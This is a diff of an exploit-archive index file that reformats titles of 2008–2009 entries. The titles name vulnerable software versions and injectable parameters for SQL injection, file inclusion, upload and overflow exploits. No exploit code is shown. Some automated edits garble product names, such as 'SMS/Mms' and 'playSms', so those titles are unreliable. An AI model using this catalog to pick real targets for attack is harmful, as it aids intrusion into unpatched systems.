(PGPwded.sys) Local Denial of Service Exploit",2008-12-23,Evilcry,windows,dos,0 -7557,platforms/php/webapps/7557.txt,"PHPmotion <= 2.1 CSRF Vulnerability",2008-12-23,Ausome1,php,webapps,0 +7557,platforms/php/webapps/7557.txt,"PHPmotion <= 2.1 - CSRF Vulnerability",2008-12-23,Ausome1,php,webapps,0 7558,platforms/php/webapps/7558.txt,"phpLD 3.3 (page.php name) Blind SQL Injection Vulnerability",2008-12-23,fuzion,php,webapps,0 7559,platforms/php/webapps/7559.php,"CMS NetCat 3.12 (password_recovery.php) Blind SQL Injection Exploit",2008-12-23,s4avrd0w,php,webapps,0 -7560,platforms/php/webapps/7560.txt,"cms netcat <= 3.12 Multiple Vulnerabilities",2008-12-23,s4avrd0w,php,webapps,0 +7560,platforms/php/webapps/7560.txt,"cms netcat <= 3.12 - Multiple Vulnerabilities",2008-12-23,s4avrd0w,php,webapps,0 7561,platforms/php/webapps/7561.txt,"phpGreetCards XSS/Arbitrary File Upload Vulnerability",2008-12-23,ahmadbady,php,webapps,0 7562,platforms/php/webapps/7562.txt,"phpAdBoard (php uploads) Arbitrary File Upload Vulnerability",2008-12-23,ahmadbady,php,webapps,0 7563,platforms/php/webapps/7563.txt,"phpEmployment (php upload) Arbitrary File Upload Vulnerability",2008-12-23,ahmadbady,php,webapps,0 @@ -7109,7 +7109,7 @@ id,file,description,date,author,platform,type,port 7566,platforms/windows/remote/7566.html,"Google Chrome Browser (ChromeHTML://) Remote Parameter Injection",2008-12-23,Nine:Situations:Group,windows,remote,0 7567,platforms/php/webapps/7567.txt,"Joomla Component com_lowcosthotels (id) Blind SQL Injection Vuln",2008-12-23,"Hussin X",php,webapps,0 7568,platforms/php/webapps/7568.txt,"Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability",2008-12-23,"Hussin X",php,webapps,0 -7569,platforms/php/webapps/7569.txt,"doop cms <= 1.4.0b (csrf/upload shell) Multiple Vulnerabilities",2008-12-24,x0r,php,webapps,0 +7569,platforms/php/webapps/7569.txt,"doop cms <= 1.4.0b (CSRF/upload shell) Multiple Vulnerabilities",2008-12-24,x0r,php,webapps,0 7570,platforms/php/webapps/7570.txt,"ILIAS <= 3.7.4 (ref_id) Blind SQL Injection Vulnerability",2008-12-24,Lidloses_Auge,php,webapps,0 7571,platforms/windows/dos/7571.txt,"BulletProof FTP Client 2.63 Local Heap Overflow PoC",2008-12-24,His0k4,windows,dos,0 7572,platforms/php/webapps/7572.txt,"Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln",2008-12-24,boom3rang,php,webapps,0 @@ -7123,7 +7123,7 @@ id,file,description,date,author,platform,type,port 7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 (lang) Local File Inclusion Vulnerability",2008-12-24,fuzion,php,webapps,0 7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw kernel Local Privledge Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit",2008-12-28,Cnaph,windows,local,0 -7583,platforms/windows/remote/7583.pl,"MS Internet Explorer XML Parsing Buffer Overflow Exploit",2008-12-28,"Jeremy Brown",windows,remote,0 +7583,platforms/windows/remote/7583.pl,"Microsoft Internet Explorer XML Parsing Buffer Overflow Exploit",2008-12-28,"Jeremy Brown",windows,remote,0 7584,platforms/windows/remote/7584.pl,"Amaya Web Browser <= 11.0.1 - Remote Buffer Overflow Exploit (vista)",2008-12-28,SkD,windows,remote,0 7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0 7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 (Auth Bypass) SQL Injection Vulnerability",2008-12-28,bizzit,php,webapps,0 @@ -7138,7 +7138,7 @@ id,file,description,date,author,platform,type,port 7598,platforms/php/webapps/7598.txt,"PHP-Fusion Mod TI (id) Remote SQL Injection Vulnerability",2008-12-28,IRCRASH,php,webapps,0 7599,platforms/asp/webapps/7599.txt,"ForumApp 3.3 - Remote Database Disclosure Vulnerability",2008-12-28,Cyber.Zer0,asp,webapps,0 7600,platforms/php/webapps/7600.pl,"Flexphplink Pro Arbitrary File Upload Exploit",2008-12-28,Osirys,php,webapps,0 -7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 Insecure Cookie Handling vulnerability",2008-12-28,Osirys,php,webapps,0 +7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 Insecure Cookie Handling Vulnerability",2008-12-28,Osirys,php,webapps,0 7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 (Auth Bypass) SQL Injection Vulnerability",2008-12-29,AnGeL25dZ,php,webapps,0 7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - (lg) Local File Inclusion Vulnerability",2008-12-29,GoLd_M,php,webapps,0 7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - (lg) Local File Inclusion Vulnerability",2008-12-29,GoLd_M,php,webapps,0 @@ -7153,7 +7153,7 @@ id,file,description,date,author,platform,type,port 7613,platforms/asp/webapps/7613.txt,"Sepcity Classified (classdis.asp ID) SQL Injection Vulnerability",2008-12-29,S.W.A.T.,asp,webapps,0 7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 (Auth Bypass) SQL Injection Vulnerability",2008-12-29,x0r,php,webapps,0 7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 (Auth Bypass) SQL Injection Vulnerability",2008-12-29,x0r,php,webapps,0 -7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x (Auth Bypass) SQL Injection Vulnerability",2008-12-29,x0r,php,webapps,0 +7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - (Auth Bypass) SQL Injection Vulnerability",2008-12-29,x0r,php,webapps,0 7617,platforms/windows/remote/7617.html,"SasCam WebCam Server 2.6.5 ActiveX Remote BOF Exploit",2008-12-29,callAX,windows,remote,0 7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure Exploit",2008-12-29,"Jon Oberheide",linux,local,0 7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - (eDNews_view.php newsid) SQL Injection Vulnerability",2008-12-29,"Virangar Security",php,webapps,0 @@ -7161,7 +7161,7 @@ id,file,description,date,author,platform,type,port 7621,platforms/php/webapps/7621.txt,"PHPAlumni (Acomment.php id) SQL Injection Vulnerability",2008-12-29,Mr.SQL,php,webapps,0 7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 Admin Login Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0 7623,platforms/windows/remote/7623.html,"Megacubo 5.0.7 (mega://) Remote eval() Injection Exploit",2008-12-30,Nine:Situations:Group,windows,remote,0 -7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x (Auth Bypass) SQL Injection Vulnerability",2008-12-30,S.W.A.T.,php,webapps,0 +7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - (Auth Bypass) SQL Injection Vulnerability",2008-12-30,S.W.A.T.,php,webapps,0 7625,platforms/php/webapps/7625.txt,"CMScout 2.06 SQL Injection/Local File Inclusion Vulnerabilities",2008-12-30,SirGod,php,webapps,0 7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script (editid1) Blind SQL Injection",2008-12-30,x0r,php,webapps,0 7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - Remote SQL Injection Vulnerability",2008-12-30,AlpHaNiX,asp,webapps,0 @@ -7169,7 +7169,7 @@ id,file,description,date,author,platform,type,port 7629,platforms/php/webapps/7629.txt,"DDL-Speed Script (acp/backup) Admin Backup Bypass Vulnerability",2009-01-01,tmh,php,webapps,0 7630,platforms/windows/remote/7630.html,"Megacubo 5.0.7 (mega://) Remote File Download and Execute Exploit",2009-01-01,JJunior,windows,remote,0 7631,platforms/php/webapps/7631.txt,"2Capsule (sticker.php id) Remote SQL Injection Vulnerability",2009-01-01,Zenith,php,webapps,0 -7632,platforms/hardware/dos/7632.txt,"Nokia S60 SMS/MMS (Curse of Silence) Denial of Service Vulnerability",2009-01-01,"Tobias Engel",hardware,dos,0 +7632,platforms/hardware/dos/7632.txt,"Nokia S60 SMS/Mms (Curse of Silence) Denial of Service Vulnerability",2009-01-01,"Tobias Engel",hardware,dos,0 7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 Change Admin Pass CSRF Vulnerability",2009-01-01,x0r,php,webapps,0 7634,platforms/windows/dos/7634.pl,"Audacity 1.2.6 (.gro File) Local Buffer Overflow PoC",2009-01-01,Houssamix,windows,dos,0 7635,platforms/php/webapps/7635.txt,"ASPThai.Net Webboard 6.0 (bview.asp) SQL Injection Vulnerability",2009-01-01,DaiMon,php,webapps,0 @@ -7180,13 +7180,13 @@ id,file,description,date,author,platform,type,port 7640,platforms/php/webapps/7640.txt,"w3blabor CMS <= 3.3.0 (Admin Bypass) SQL Injection Vulnerability",2009-01-01,DNX,php,webapps,0 7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 (news.php newsid) SQL Injection Vulnerability",2009-01-01,"Virangar Security",php,webapps,0 7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a (Auth Bypass) SQL Injection Vulnerability",2009-01-01,"Virangar Security",php,webapps,0 -7643,platforms/multiple/dos/7643.txt,"Konqueror 4.1 XSS / Remote Crash Vulnerabilities",2009-01-01,StAkeR,multiple,dos,0 +7643,platforms/multiple/dos/7643.txt,"Konqueror 4.1 - XSS / Remote Crash Vulnerabilities",2009-01-01,StAkeR,multiple,dos,0 7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Remote File Upload Vulnerability",2009-01-02,ZoRLu,php,webapps,0 7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Remote File Upload Vulnerability",2009-01-02,ZoRLu,php,webapps,0 7646,platforms/multiple/local/7646.txt,"PHP <= 5.2.8 gd library - imageRotate() Information Leak Vulnerability",2009-01-02,"Hamid Ebadi",multiple,local,0 7647,platforms/multiple/dos/7647.txt,"VMware <= 2.5.1 (Vmware-authd) Remote Denial of Service Exploit",2009-01-02,"laurent gaffié ",multiple,dos,0 7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 (rfi/lfi/xss) Multiple Vulnerabilities",2009-01-02,ahmadbady,php,webapps,0 -7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 0 (.m3u File) Local Buffer Overflow PoC",2009-01-02,"aBo MoHaMeD",windows,dos,0 +7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - (.m3u File) Local Buffer Overflow PoC",2009-01-02,"aBo MoHaMeD",windows,dos,0 7650,platforms/php/webapps/7650.php,"Lito Lite CMS Multiple Cross Site Scripting / Blind SQL Injection Exploit",2009-01-03,darkjoker,php,webapps,0 7651,platforms/windows/local/7651.py,"Destiny Media Player 1.61 - (.m3u File) Local Stack Overflow Exploit",2009-01-03,His0k4,windows,local,0 7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow PoC",2009-01-03,"Encrypt3d.M!nd ",windows,dos,0 @@ -7202,8 +7202,8 @@ id,file,description,date,author,platform,type,port 7662,platforms/windows/local/7662.py,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (5)",2009-01-04,suN8Hclf,windows,local,0 7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 (id) Remote SQL Injection Vulnerability",2009-01-04,ZoRLu,php,webapps,0 7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 (viewarticle.php id) Blind SQL Injection Exploit",2009-01-04,darkjoker,php,webapps,0 -7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro (acc.mdb) Database Disclosure Vulnerability",2009-01-05,ByALBAYX,asp,webapps,0 -7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro (Auth Bypass) SQL Injection Vulnerability",2009-01-05,ByALBAYX,asp,webapps,0 +7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - (acc.mdb) Database Disclosure Vulnerability",2009-01-05,ByALBAYX,asp,webapps,0 +7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - (Auth Bypass) SQL Injection Vulnerability",2009-01-05,ByALBAYX,asp,webapps,0 7667,platforms/php/webapps/7667.txt,"Joomla Component simple_review 1.x SQL Injection Vulnerability",2009-01-05,EcHoLL,php,webapps,0 7668,platforms/php/webapps/7668.pl,"Cybershade CMS 0.2b (index.php) Remote File Inclusion Exploit",2009-01-05,JosS,php,webapps,0 7669,platforms/php/webapps/7669.pl,"Joomla com_na_newsdescription (newsid) SQL Injection Exploit",2009-01-05,EcHoLL,php,webapps,0 @@ -7224,7 +7224,7 @@ id,file,description,date,author,platform,type,port 7684,platforms/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow Exploit",2009-01-06,"Encrypt3d.M!nd ",windows,local,0 7685,platforms/multiple/dos/7685.pl,"SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit",2009-01-06,StAkeR,multiple,dos,0 7686,platforms/php/webapps/7686.txt,"ItCMS <= 2.1a (Auth Bypass) SQL Injection Vulnerability",2009-01-06,certaindeath,php,webapps,0 -7687,platforms/php/webapps/7687.txt,"playSMS 0.9.3 - Multiple Remote/Local File Inclusion Vulnerabilities",2009-01-06,ahmadbady,php,webapps,0 +7687,platforms/php/webapps/7687.txt,"playSms 0.9.3 - Multiple Remote/Local File Inclusion Vulnerabilities",2009-01-06,ahmadbady,php,webapps,0 7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 (Cisco IOS-MD5) Local Buffer Overflow Exploit",2009-01-07,send9,windows,local,0 7689,platforms/php/webapps/7689.txt,"BlogHelper (common_db.inc) Remote Config File Disclosure Vulnerability",2009-01-06,ahmadbady,php,webapps,0 7690,platforms/php/webapps/7690.txt,"PollHelper (poll.inc) Remote Config File Disclosure Vulnerability",2009-01-06,ahmadbady,php,webapps,0 @@ -7247,7 +7247,7 @@ id,file,description,date,author,platform,type,port 7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit",2009-01-08,Cnaph,windows,local,0 7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 (.mp3 File) Local Heap Overflow PoC",2009-01-09,Houssamix,windows,dos,0 7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - .ASX File (HREF) Local Buffer Overflow PoC",2009-01-09,"aBo MoHaMeD",windows,dos,0 -7710,platforms/windows/dos/7710.html,"MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit",2009-01-09,Skylined,windows,dos,0 +7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer JavaScript screen[ ] Denial of Service Exploit",2009-01-09,Skylined,windows,dos,0 7711,platforms/php/webapps/7711.txt,"Fast FAQs System (Auth Bypass) SQL Injection Vulnerability",2009-01-09,x0r,php,webapps,0 7712,platforms/hardware/remote/7712.txt,"Netgear WG102 Leaks SNMP write password with read access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0 7713,platforms/windows/local/7713.pl,"VUPlayer 2.49 - .ASX File (HREF) Local Buffer Overflow Exploit (2)",2009-01-09,Houssamix,windows,local,0 @@ -7277,7 +7277,7 @@ id,file,description,date,author,platform,type,port 7737,platforms/windows/dos/7737.py,"Triologic Media Player 7 (.m3u) Local Heap Buffer Overflow PoC",2009-01-12,zAx,windows,dos,0 7738,platforms/php/webapps/7738.txt,"Wordpress plugin WP-Forum 1.7.8 - Remote SQL Injection Vulnerability",2009-01-12,seomafia,php,webapps,0 7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 (Download File) Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0 -7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 Remote File Upload Vulnerability",2009-01-12,ahmadbady,php,webapps,0 +7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Remote File Upload Vulnerability",2009-01-12,ahmadbady,php,webapps,0 7741,platforms/asp/webapps/7741.txt,"dMx READY (25 Products) Remote Database Disclosure Vulnerability",2009-01-12,Cyber-Zone,asp,webapps,0 7742,platforms/windows/dos/7742.txt,"Winamp <= 5.541 (mp3/aiff) Multiple Denial of Service Exploits",2009-01-12,securfrog,windows,dos,0 7743,platforms/php/webapps/7743.txt,"Realtor 747 (define.php INC_DIR) Remote File Inclusion Vulnerability",2009-01-12,ahmadbady,php,webapps,0 @@ -7294,10 +7294,10 @@ id,file,description,date,author,platform,type,port 7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager <= 1.1 Contents Change Vulnerability",2009-01-13,ajann,asp,webapps,0 7755,platforms/windows/remote/7755.html,"PowerPoint Viewer OCX 3.1 - Remote File Execution Exploit",2009-01-13,Cyber-Zone,windows,remote,0 7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 (CWD) Remote Memory Consumption Exploit",2009-01-13,His0k4,windows,dos,0 -7757,platforms/windows/remote/7757.html,"Word Viewer OCX 3.2 - Remote File Execution exploit",2009-01-13,Stack,windows,remote,0 +7757,platforms/windows/remote/7757.html,"Word Viewer OCX 3.2 - Remote File Execution Exploit",2009-01-13,Stack,windows,remote,0 7758,platforms/php/webapps/7758.txt,"Dark Age CMS <= 0.2c Beta - (Auth Bypass) SQL Injection Vulnerability",2009-01-13,darkjoker,php,webapps,0 7759,platforms/php/webapps/7759.txt,"Syzygy CMS <= 0.3 (Auth Bypass) SQL Injection Vulnerability",2009-01-14,darkjoker,php,webapps,0 -7760,platforms/multiple/remote/7760.php,"TeamSpeak <= 2.0.23.17 Remote File Disclosure Vulnerability",2009-01-14,c411k,multiple,remote,0 +7760,platforms/multiple/remote/7760.php,"TeamSpeak <= 2.0.23.17 - Remote File Disclosure Vulnerability",2009-01-14,c411k,multiple,remote,0 7761,platforms/asp/webapps/7761.txt,"netvolution cms 1.0 (xss/sql) Multiple Vulnerabilities",2009-01-14,Ellinas,asp,webapps,0 7762,platforms/windows/remote/7762.html,"EDraw Office Viewer 5.4 HttpDownloadFile() Insecure Method Vuln",2009-01-14,Cyber-Zone,windows,remote,0 7763,platforms/windows/remote/7763.html,"Excel Viewer OCX 3.2 - Remote File Execution Exploit",2009-01-14,Stack,windows,remote,0 @@ -7316,7 +7316,7 @@ id,file,description,date,author,platform,type,port 7776,platforms/hardware/dos/7776.c,"Cisco VLAN Trunking Protocol Denial of Service Exploit",2009-01-14,showrun,hardware,dos,0 7777,platforms/php/webapps/7777.txt,"Joomla Component Fantasytournament SQL Injection Vulnerabilities",2009-01-14,H!tm@N,php,webapps,0 7778,platforms/php/webapps/7778.txt,"phpList <= 2.10.8 - Local File Inclusion Vulnerability",2009-01-14,BugReport.IR,php,webapps,0 -7779,platforms/windows/remote/7779.html,"AAA EasyGrid ActiveX 3.51 Remote File Overwrite Exploit",2009-01-14,Houssamix,windows,remote,0 +7779,platforms/windows/remote/7779.html,"AAA EasyGrid ActiveX 3.51 - Remote File Overwrite Exploit",2009-01-14,Houssamix,windows,remote,0 7780,platforms/php/webapps/7780.pl,"phosheezy 2.0 - Remote Command Execution Exploit",2009-01-14,Osirys,php,webapps,0 7781,platforms/multiple/remote/7781.txt,"Oracle Secure Backup 10g exec_qr() Command Injection Vulnerability",2009-01-14,"Joxean Koret",multiple,remote,0 7782,platforms/asp/webapps/7782.txt,"DMXReady PayPal Store Manager <= 1.1 Contents Change Vulnerability",2009-01-14,ajann,asp,webapps,0 @@ -7351,7 +7351,7 @@ id,file,description,date,author,platform,type,port 7812,platforms/multiple/dos/7812.pl,"MPlayer 1.0rc2 TwinVQ Stack Buffer Overflow PoC",2009-01-16,sCORPINo,multiple,dos,0 7813,platforms/php/webapps/7813.txt,"Simple PHP Newsletter 1.5 (olang) Local File Inclusion Vulnerabilities",2009-01-16,ahmadbady,php,webapps,0 7814,platforms/php/webapps/7814.txt,"BibCiter 1.4 - Multiple SQL Injection Vulnerabilities",2009-01-16,nuclear,php,webapps,0 -7815,platforms/php/webapps/7815.txt,"Joomla Component Gigcal 1.x (id) SQL Injection Vulnerability",2009-01-18,Lanti-Net,php,webapps,0 +7815,platforms/php/webapps/7815.txt,"Joomla Component Gigcal 1.x - (id) SQL Injection Vulnerability",2009-01-18,Lanti-Net,php,webapps,0 7816,platforms/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN Database Disclosure Vulnerability",2009-01-18,Moudi,asp,webapps,0 7817,platforms/php/webapps/7817.txt,"Click&Email (Auth Bypass) SQL Injection Vulnerability",2009-01-18,SuB-ZeRo,php,webapps,0 7818,platforms/php/webapps/7818.txt,"SCMS 1 - (index.php p) Local File Inclusion Vulnerability",2009-01-18,ahmadbady,php,webapps,0 @@ -7393,7 +7393,7 @@ id,file,description,date,author,platform,type,port 7855,platforms/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 m3u file Local Buffer Overflow PoC",2009-01-25,Houssamix,windows,dos,0 -7858,platforms/hardware/remote/7858.php,"Siemens ADSL SL2-141 CSRF Exploit",2009-01-25,spdr,hardware,remote,0 +7858,platforms/hardware/remote/7858.php,"Siemens ADSL SL2-141 - CSRF Exploit",2009-01-25,spdr,hardware,remote,0 7859,platforms/php/webapps/7859.pl,"MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit",2009-01-25,StAkeR,php,webapps,0 7860,platforms/php/webapps/7860.php,"Mambo com_sim 0.8 - Blind SQL Injection Exploit",2009-01-25,"Mehmet Ince",php,webapps,0 7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-01-25,ByALBAYX,asp,webapps,0 @@ -7441,8 +7441,8 @@ id,file,description,date,author,platform,type,port 7905,platforms/php/webapps/7905.pl,"Personal Site Manager <= 0.3 - Remote Command Execution Exploit",2009-01-29,darkjoker,php,webapps,0 7906,platforms/windows/dos/7906.pl,"Amaya Web Editor <= 11.0 - Remote Buffer Overflow PoC",2009-01-29,Stack,windows,dos,0 7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 (admin.manage) Remote Contents Change Vulnerability",2009-01-29,ByALBAYX,php,webapps,0 -7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 Remote PHP File Upload Vulnerability",2009-01-29,"Michael Brooks",php,webapps,0 -7910,platforms/windows/remote/7910.html,"WOW - Web On Windows ActiveX Control 2 Remote Code Execution",2009-01-29,"Michael Brooks",windows,remote,0 +7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote PHP File Upload Vulnerability",2009-01-29,"Michael Brooks",php,webapps,0 +7910,platforms/windows/remote/7910.html,"WOW - Web On Windows ActiveX Control 2 - Remote Code Execution",2009-01-29,"Michael Brooks",windows,remote,0 7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple Remote SQL Injection VUlnerabilities",2009-01-29,Zigma,php,webapps,0 7912,platforms/windows/remote/7912.txt,"Internet Explorer 7 ClickJacking Vulnerability (2009-01-23)",2009-01-29,UzmiX,windows,remote,0 7913,platforms/windows/remote/7913.pl,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow Exploit",2009-01-29,SkD,windows,remote,21 @@ -7457,7 +7457,7 @@ id,file,description,date,author,platform,type,port 7923,platforms/windows/local/7923.c,"Total Video Player 1.3.7 (.m3u) Local Buffer Overflow Exploit",2009-01-29,SimO-s0fT,windows,local,0 7924,platforms/asp/webapps/7924.txt,"SalesCart (Auth Bypass) SQL Injection Vulnerability",2009-01-30,ByALBAYX,asp,webapps,0 7925,platforms/php/webapps/7925.txt,"revou twitter clone (xss/sql) Multiple Vulnerabilities",2009-01-30,nuclear,php,webapps,0 -7926,platforms/windows/remote/7926.pl,"Amaya Web Editor 11 Remote SEH Overwrite Exploit",2009-01-30,LiquidWorm,windows,remote,0 +7926,platforms/windows/remote/7926.pl,"Amaya Web Editor 11 - Remote SEH Overwrite Exploit",2009-01-30,LiquidWorm,windows,remote,0 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 (09.01.30) Multiple Local/Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0 7928,platforms/windows/remote/7928.txt,"Synactis All_IN_THE_BOX ActiveX 3.0 - Null byte File Overwrite Vuln",2009-01-30,DSecRG,windows,remote,0 7929,platforms/windows/local/7929.c,"GOM Player 2.0.12 (.PLS) Universal Buffer Overflow Exploit",2009-01-30,Stack,windows,local,0 @@ -7509,7 +7509,7 @@ id,file,description,date,author,platform,type,port 7979,platforms/php/webapps/7979.txt,"GRBoard 1.8 - Multiple Remote File Inclusion Vulnerabilities",2009-02-04,make0day,php,webapps,0 7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 (bbcode.php l) Local File Inclusion Exploit",2009-02-04,Osirys,php,webapps,0 7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - (DD/XSS) Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 -7982,platforms/asp/webapps/7982.txt,"team 1.x (dd/xss) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 +7982,platforms/asp/webapps/7982.txt,"team 1.x - (dd/xss) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 7984,platforms/php/webapps/7984.pl,"YapBB <= 1.2 (forumID) Blind SQL Injection Exploit",2009-02-04,darkjoker,php,webapps,0 7985,platforms/windows/dos/7985.pl,"Novell GroupWise <= 8.0 Malformed RCPT command Off-by-one Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0 7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 (Authorization) Stack BOF PoC",2009-02-04,"Praveen Darshanam",windows,dos,0 @@ -7524,7 +7524,7 @@ id,file,description,date,author,platform,type,port 7995,platforms/windows/dos/7995.pl,"FeedMon 2.7.0.0 outline Tag Buffer Overflow Exploit PoC",2009-02-05,"Praveen Darshanam",windows,dos,0 7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 (Misspelled htaccess) Insecure DD Vulnerability",2009-02-05,Room-Hacker,php,webapps,0 7997,platforms/php/webapps/7997.htm,"txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0 -7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 Remote PHP File Upload Vulnerability",2009-02-06,ByALBAYX,php,webapps,0 +7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote PHP File Upload Vulnerability",2009-02-06,ByALBAYX,php,webapps,0 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution Exploit",2009-02-06,Osirys,php,webapps,0 8000,platforms/php/webapps/8000.txt,"zeroboard4 pl8 (07.12.17) Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 Insecure Backup/Local File Inclusion Vulnerabilities",2009-02-06,SirGod,php,webapps,0 @@ -7535,13 +7535,13 @@ id,file,description,date,author,platform,type,port 8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Remote File Upload Vulnerability",2009-02-09,fantastic,php,webapps,0 8007,platforms/php/webapps/8007.php,"IF-CMS <= 2.0 (frame.php id) Blind SQL Injection Exploit",2009-02-09,darkjoker,php,webapps,0 8008,platforms/hardware/dos/8008.txt,"Netgear embedded Linux for the SSL312 router DoS Vulnerability",2009-02-09,Rembrandt,hardware,dos,0 -8009,platforms/php/webapps/8009.pl,"w3bcms <= 3.5.0 - Multiple Vulnerabilities exploit",2009-02-09,DNX,php,webapps,0 +8009,platforms/php/webapps/8009.pl,"w3bcms <= 3.5.0 - Multiple Vulnerabilities Exploit",2009-02-09,DNX,php,webapps,0 8010,platforms/windows/local/8010.pl,"FeedDemon <= 2.7 OPML Outline Tag Buffer Overflow Exploit",2009-02-09,cenjan,windows,local,0 8011,platforms/php/webapps/8011.txt,"BusinessSpace <= 1.2 (id) Remote SQL Injection Vulnerability",2009-02-09,K-159,php,webapps,0 8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery (entry) SQL Injection Vuln",2009-02-09,BackDoor,php,webapps,0 8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 (JPG File) Remote Crash PoC",2009-02-09,"Juan Yacubian",hardware,dos,0 -8014,platforms/php/webapps/8014.pl,"PHP Director <= 0.21 Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 -8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS <= 1.21 Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 +8014,platforms/php/webapps/8014.pl,"PHP Director <= 0.21 - Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 +8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS <= 1.21 - Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 8016,platforms/php/webapps/8016.txt,"adaptcms lite 1.4 (xss/rfi) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 (RFI/XSS) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 